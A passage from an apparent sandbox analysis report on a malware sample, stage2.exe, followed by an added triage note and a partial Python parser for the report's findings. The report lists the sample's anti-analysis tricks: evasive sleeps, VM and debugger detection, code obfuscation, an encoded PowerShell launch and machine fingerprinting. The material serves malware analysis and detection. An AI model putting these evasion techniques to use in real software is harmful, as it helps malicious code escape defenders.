Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: stage2.exe, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.stage2.exe.ea0000.0.unpack, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.stage2.exe.ea0000.1.unpack, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.stage2.exe.ea0000.0.unpack, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.stage2.exe.ea0000.2.unpack, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E77471 push C033084Eh; ret 2_2_07E77482
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E773CF push C033084Eh; ret 2_2_07E773E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E7F1A0 push eax; ret 2_2_07E7F1B3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07EA67E1 push es; ret 2_2_07EA67EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A327A0 push ebp; ret 13_2_07A327B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A32780 push esp; ret 13_2_07A32794
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3273A push esp; ret 13_2_07A32794
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A667E1 push es; ret 13_2_07A667EC
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3260 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1461 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4329 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3659 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.26.dr Binary or memory string: VMware
Source: Amcache.hve.26.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.26.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.26.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.26.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427690622.0000000004CA2000.00000004.00000001.sdmp Binary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475815541.0000000004BD3000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.478987968.0000000004B64000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479178780.0000000004BD3000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.26.dr Binary or memory string: VMware, Inc.me
Source: WerFault.exe, 0000001A.00000003.473935861.0000000004BD3000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.26.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.26.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.26.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.26.dr Binary or memory string: VMware7,1
Source: Amcache.hve.26.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.26.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.26.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.26.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.26.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.26.dr Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4}{
Source: powershell.exe, 0000000D.00000002.431025294.0000000007A94000.00000004.00000001.sdmp Binary or memory string: hell\v1.0\Modules\Hyper-V
Source: Amcache.hve.26.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp Binary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VhD

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\Desktop\stage2.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\stage2.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\stage2.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\stage2.exe Process created: Base64 decoded Start-Sleep -s 10
Source: C:\Users\user\Desktop\stage2.exe Process created: Base64 decoded Start-Sleep -s 10 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== Jump to behavior
Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp Binary or memory string: Progman
Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\stage2.exe Queries volume information: C:\Users\user\Desktop\stage2.exe VolumeInformation
Source: C:\Users\user\Desktop\stage2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Users\user\Desktop\stage2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080D5860 CreateNamedPipeW, 13_2_080D5860

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.26.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.dr Binary or memory string: procexp.exe
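Triage note and worked example (added here; not part of the Joe Sandbox report). Two of the finding groups above should be weighed before they are counted as signal. Of the "Queries volume information" entries, most targets are GAC assemblies and CatRoot signature catalogs that any .NET or PowerShell process touches while loading modules; the entries that matter for host fingerprinting are stage2.exe querying its own image, powershell.exe querying the C:\ volume (a volume serial is a classic machine-ID input) and stage2.exe reading HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid. The "AV process strings" hits, by contrast, are sourced from Amcache.hve.26.dr and Amcache.hve.LOG1.26.dr: the .dr suffix is Joe Sandbox's marker for a file written during analysis, and Amcache.hve is the analysis VM's own application-compatibility hive, so procexp.exe and msmpeng.exe here most likely record programs that ran on the sandbox host rather than strings embedded in stage2.exe. The Python below (an added example; REPORT_LINES is constructed from the report lines above, and the bucket names and the "loader noise" heuristic are this example's own assumptions, not report categories) parses these three finding types, collapses duplicate entries, separates fingerprint candidates from loader noise, and records where each string hit came from.

```python
"""Triage helper for Joe Sandbox text-report finding lines (added example,
not part of the report or the sample).  Parses 'Queries volume information',
'Key value queried' and 'Binary or memory string' lines, de-duplicates them,
buckets volume-information targets, and classifies string-hit provenance."""
import re
from collections import defaultdict

# Constructed input: a subset of the report's own lines, copied verbatim
# (including a duplicated System.Data.dll entry and the trailing link text).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\stage2.exe Queries volume information: C:\Users\user\Desktop\stage2.exe VolumeInformation Jump to behavior",
    r"Source: C:\Users\user\Desktop\stage2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior",
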